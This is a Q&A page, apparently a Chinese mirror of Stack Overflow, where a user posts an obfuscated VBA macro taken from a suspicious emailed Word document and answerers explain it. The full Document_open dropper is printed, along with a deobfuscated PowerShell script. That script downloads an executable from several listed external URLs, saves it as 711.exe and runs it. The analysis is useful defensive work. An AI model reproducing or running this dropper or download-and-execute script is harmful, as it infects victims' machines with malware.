代码之家  ›  专栏  ›  技术社区  ›  TheStrangeQuark

这个visualbasic代码是做什么的?Microsoft word宏

virus word-vba ms-word vba
  •  4
  • TheStrangeQuark  · 技术社区  · 6 年前

    我收到一封电子邮件,里面有一个word文档,里面有一些内置宏。我禁用了它们并检查了它们。这些代码看起来都是胡言乱语,但也许其他人能帮我弄清楚它在做什么? 

    Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "zFpiVaXZHXwfhz" + "U" + "2692" + "Zt"
   Second "uqwSRYVhz" + "387021345" + "kzB" + "8730"
   Second "kz" + "1499" + "tkAh" + "p"
   Second "P" + "8389"
   Second "4180" + "jmCmdHzM" + "IcRbPsSnK" + "bWtnR"
   Second "357881955" + "3117" + "ijHmwpiFZCcjw" + "bvt"
Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)
   Second "pqENJzbA" + "208599822" + "Ovav" + "A"
   Second "HmjZtUmz" + "7073"
   Second "hYRErMnn" + "4277"
End Sub

    这是在模块上: 

    Function KlXaMrm()

On _
Error _
Resume _
Next
Second "IVozFsCNdj" + "muE"
   Second "wwrMmsOX" + "ii"
   Second "7048" + "RLBLOvif"
   Second "315289259" + "bGl" + "wcZUd" + "8842"
bkzhl = Format(Chr(9 + 16 + 4 + 2 + 68)) + "md /V" + "^:O/" + Format(Chr(6 + 11 + 3 + 1 + 46)) + Format(Chr(3 + 5 + 1 + 0 + 25)) + "^" + "s^" + "e^" + "t ^WvU^" + "y=^  " + " ^  ^ " + "^   " + "^   ^ "
Second "IWV" + "FalMBYmN" + "6772" + "vIi"
   Second "BfMwfQziXwj" + "fvQGQha"
   Second "hBcrV" + "380436099"
ipaSHnJ = " " + "^ ^ ^ " + "}" + "}" + "^{" + "^h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^" + "ta" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "};" + "^k^a^"
Second "31392559" + "BMS"
kVaBhn = "e" + "r^b;Yu" + "r^$ " + "^m^e^tI" + "^-e" + "k" + "o" + "vnI^;"
Second "965" + "5880" + "XJTdjHJSV" + "Abrh"
HzutiHjFO = ")Y^u" + "r^" + "$ ^,^pN" + "B^" + "$" + "(^eliF" + "d"
Second "E" + "5438"
   Second "MhjZXFtjz" + "52832268"
zBPwbjSP = "^a" + "^olnwoD" + ".j^" + "p^X$^{^" + "yr"
Second "oWcn" + "1454"
   Second "UmZTRVGRUadD" + "7070" + "Hb" + "Z"
   Second "GiNa" + "EjiBfz"
   Second "ZLiR" + "iSRc" + "LaHCfQjrI" + "467392171"
   Second "376971481" + "ATq"
wZvZZZCL = "^t{" + ")" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi$^" + " n^i" + "^" + " ^pN" + "B^$(h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^a" + "^e" + "r^o^f^;" + "'" + "^e^x^e"
Second "1426" + "2730" + "131359904" + "2661"
   Second "tZ" + "A"
FVkwvLXivOm = "^.^'+^f" + "aw" + "^$+" + "'\'^+" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "i^" + "l" + "^" + "b^u^p:v"
Second "obmhCVWdl" + "1876"
LEFDwJt = "n" + "e^$^=Y" + "^ur^$;'" + "^1^" + "1^7" + "^' =^ " + "f^aw$;" + ")^'@^" + "'(" + "t" + "ilp^S.^"
Second "mHz" + "2845" + "swVQqO" + "sTaM"
   Second "151506295" + "9519"
   Second "530531760" + "421003665" + "33902179" + "zE"
UjhKfLskOAw = "'^" + "D^GoP/" + "m" + "^o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "^t"
Second "1424" + "AS" + "qWRt" + "jTfL"
   Second "144" + "385570591" + "YNItdvcRQLGKl" + "273801574"
   Second "8474" + "427918883" + "101014623" + "2181"
oHsEGJKpH = "^o" + "^p^" + "sno" + "r^i" + "//:p^t" + "t^h^@j" + "fW^FVF^" + "8r/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "e^u" + "v" + "^"
Second "LIdEK" + "9208"
   Second "GHY" + "w"
   Second "licB" + "57965560" + "BkiEX" + "uNEQdXXBb"
wIVBCzu = "ero^o^" + "b" + "a^keep" + "/" + "/^:^p^"
KlXaMrm = bkzhl + ipaSHnJ + kVaBhn + HzutiHjFO + zBPwbjSP + wZvZZZCL + FVkwvLXivOm + LEFDwJt + UjhKfLskOAw + oHsEGJKpH + wIVBCzu
   Second "kmpQXLAuN" + "fh" + "365194270" + "n"
   Second "70996280" + "nJ"
   Second "QTviGhI" + "RV" + "315865801" + "UcJFQ"
End Function
Function bMdNCkVCVn()

On _
Error _
Resume _
Next
Second "FddKlw" + "OTSBodYZZ"
PpRpwRnf = "tth^" + "@uj^l^" + "h^o" + "/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.^" + "gn" + "^it" + "nia^p"
Second "wCkfREKOG" + "AfRUmpAd" + "WL" + "GICb"
   Second "rBzjjYzi" + "zL"
LOkOMzwwZEb = "m^ot^su" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ra" + "^" + "t^sen^" + "o" + "^l//^:" + "p^t^t" + "h"
Second "rlTmjU" + "jYwjHViv" + "dqjiW" + "c"
   Second "WHUDRQuddUoQr" + "lIcDDYCTjsUVWs" + "4956" + "mJ"
   Second "9262" + "171867944" + "464524065" + "7760"
WnITU = "^@u^A" + "/^ur.^m" + "b^s-t" + "^evs^" + "s" + "^ar" + "//^:p^t" + "th" + "@^F^p2G" + "^zx^W/^"
Second "184947357" + "wjOV"
   Second "5399" + "jwuBT"
   Second "402560265" + "449" + "l" + "BBBuHZnMK"
   Second "MrA" + "nMwkzNbY" + "429759967" + "bqC"
WsfkNBcA = "mo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.k" + "ro" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ege" + "l^lo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "sn" + "i" + "^t" + "r^a^mt^" + "s//" + ":p" + "^t" + "^"
Second "534498195" + "HX" + "vwKkqLAvKmm" + "279702571"
   Second "KYJPBi" + "ivTUzZOfj" + "162850888" + "WbZ"
RqVln = "th'^=" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi^$" + ";^" + "t" + "n^e^i" + "^l" + Format(Chr(6 + 11 + 3 + 1 + 46)) + "be^W" + "^.t^e" + "N^ t" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ejb^o" + "-^w^e" + "n=" + "^j" + "pX^"
Second "fbvS" + "F"
   Second "BmJt" + "Y"
   Second "z" + "qlRwULuPK" + "NE" + "2370"
   Second "467432993" + "510382039" + "V" + "357745589"
TTWnMmnb = "$ ll^e" + "h^s" + "r^e^w^" + "o^p" + "&&" + "^f^o"
Second "FQvcEKz" + "IN" + "419878734" + "aWRD"
   Second "Gs" + "qiWjuwsKkDzj"
   Second "w" + "iZv" + "ri" + "jbl"
HuAjss = "r /L" + " %^5" + " ^" + "in (^" + "37" + "^3,-" + "^1,^0)^" + "do s^e^" + "t" + " 3^1=!3"
Second "IIz" + "pwb" + "OiIRoWEPKvRSu" + "fLYzMV"
   Second "I" + "5470" + "uC" + "vzYpG"
   Second "Prm" + "D"
vWYHrcNLA = "^" + "1!!" + "^WvU^y" + ":~%^5" + ",1!&" + "&i" + "^" + "f %^5" + "=^=^0" + " " + Format(Chr(9 + 16 + 4 + 2 + 68)) + "a^l^l"
Second "QqFfMn" + "mmslG"
fGbIAE = " " + "%3^1:" + "*^" + "3^1^" + "!^"
bMdNCkVCVn = PpRpwRnf + LOkOMzwwZEb + WnITU + WsfkNBcA + RqVln + TTWnMmnb + HuAjss + vWYHrcNLA + fGbIAE
   Second "kWluI" + "lFK"
   Second "FoYWtEQUo" + "SPqoT" + "m" + "1515"
   Second "QHGQ" + "f"
End Function
Function zZZwVld()

On _
Error _
Resume _
Next
Second "15045220" + "Cfku" + "finOQwh" + "mUISHvGpDwIp"
   Second "297480629" + "wXWqc"
   Second "RJ" + "1178" + "XfKGfw" + "znaVlIj"
sFjEfzuO = "=%" + Format(Chr(3 + 5 + 1 + 0 + 25)) + "  " + ""
zZZwVld = sFjEfzuO
   Second "7008" + "530276898"
End Function

    我猜这是恶意的,但我对visualbasic不太熟悉。我也不确定这是不是问这个的合适地方。

    2 回复  |  直到 4 年前
        1
  •  3
  •   GSerg    6 年前

    所有以开头的行 Second 是导致运行时错误而不执行任何操作的噪波。它们的存在只是为了迷惑杀毒软件。

    如果将它们全部删除,则会留下一堆字符串赋值。最后它们加起来就是以下字符串: 

    cmd /V^:O/C"^s^e^t ^WvU^y=^   ^  ^ ^   ^   ^  ^ ^ ^ }}^{^hc^tac};^k^a^er^b;Yur^$ ^m^e^tI^-ekovnI^;)Y^ur^$ ^,^pNB^$(^eliFd^a^olnwoD.j^p^X$^{^yr^t{)c^oi$^ n^i^ ^pNB^$(hc^a^er^o^f^;'^e^x^e^.^'+^faw^$+'\'^+ci^l^b^u^p:vne^$^=Y^ur^$;'^1^1^7^' =^ f^aw$;)^'@^'(tilp^S.^'^D^GoP/m^oc.^t^o^p^snor^i//:p^tt^h^@jfW^FVF^8r/m^oc.e^uv^ero^o^ba^keep//^:^p^tth^@uj^l^h^o/m^oc^.^gn^itnia^pm^ot^sucra^t^sen^o^l//^:p^t^th^@u^A/^ur.^mb^s-t^evs^s^ar//^:p^tth@^F^p2G^zx^W/^moc^.krocegel^locsni^tr^a^mt^s//:p^t^th'^=c^oi^$;^tn^e^i^lCbe^W^.t^eN^ tcejb^o-^w^en=^jpX^$ ll^eh^sr^e^w^o^p&&^f^or /L %^5 ^in (^37^3,-^1,^0)^do s^e^t 3^1=!3^1!!^WvU^y:~%^5,1!&&i^f %^5=^=^0 ca^l^l %3^1:*^3^1^!^=%"

    这是一个运行的shell命令 cmd 带开关 /V:O /C:"<obfuscated command>" .
    命令 从字面上看下一个角色。

    reverses it back

    最终执行的Powershell脚本是: 

    $Xpj=new-object Net.WebClient;
$ioc='http://stmartinscollegecork.com/WxzG2pF@http://rassvet-sbm.ru/Au@http://lonestarcustompainting.com/ohlju@http://peekaboorevue.com/r8FVFWfj@http://ironspot.com/PoGD'.Split('@');
$waf='711';
$ruY=$env:public + '\' + $waf + '.exe';
foreach($BNp in $ioc) {
    try {
        $Xpj.DownloadFile($BNp, $ruY);
        Invoke-Item $ruY;
        break;
    }catch{}
}

    public folder 作为 711.exe 然后运行它。它在第一次成功运行时停止。

        2
  •  3
  •   Vityata    6 年前

    只要打开文档,代码就会被激活。看起来确实是某种病毒。 这是一种恶意的行为。 如果您想查看它的功能,请替换以下行:

    Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)

    使用:

    MsgBox KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)

    看到了吗 MsgBox() . 或者最好删除它 Shell 命令也是。然后你很可能需要重新安装你的电脑。

    推荐文章
    Tim Dol  ·  Word VSO获取Office URI方案设置的默认存储位置
    2 年前
    Jonathan L  ·  Mailmerge-单个PDF-前2行不是标题
    2 年前
    Saxman  ·  在允许VBA的同时限制Word文档
    6 年前
    Shabaz  ·  在Word文档中的(单引号/双引号)之间搜索文本
    6 年前
    dieKoderin  ·  使用vba编辑Microsoft Word标题中的定位点位置
    6 年前
    SlowLearner  ·  MS Word是否具有与ExecuteExcel4Macro等效的
    6 年前
    Ratilius  ·  Excel Vba to Word:如何将页码写入文本框?
    6 年前
    plaene  ·  在VBA中搜索特定的Word文档选择
    6 年前
    Walid Abdelal  ·  预格式化字符串的在线插入
    6 年前
    simplify  ·  从WORD表格VBA获取公式值
    6 年前
    关于   移动版
    代码之家 - 一站式码农服务社区
    沪ICP备11025650号